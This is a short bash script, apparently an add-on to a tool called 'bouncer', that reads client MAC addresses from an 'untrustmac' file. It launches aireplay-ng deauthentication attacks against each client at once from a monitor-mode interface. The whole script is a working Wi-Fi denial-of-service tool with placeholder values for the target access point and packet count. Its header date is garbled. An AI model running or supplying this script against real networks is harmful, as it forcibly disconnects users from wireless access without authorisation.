#!/bin/bash
#created: COUNT/12/1020
#extension for bouncer!
#deauth all @ same time! | will use the untrustmac file generated by bouncer.
if [[ ${UID} -ne 0 ]]; then
exit 1
fi

wlan0=$(ip a | grep mon | head -1 | cut -d ":" -f 2)
MYBSSID="00:00:00:00:00:00"

lines=$(wc -l untrustmac | cut -d " " -f1)
actual=$(($lines-1))

cat untrustmac | tail -n -$actual -f | while read mac; do 
exec sudo xterm -e aireplay-ng --deauth COUNT -a $MYBSSID -c $mac $wlan0 &
done

#sudo airmon-ng stop $wlan0 2>&1> /dev/null
#sudo ip link set $wifi down 2>&1> /dev/null
#sudo ip link set $wifi up 2>&1> /dev/null

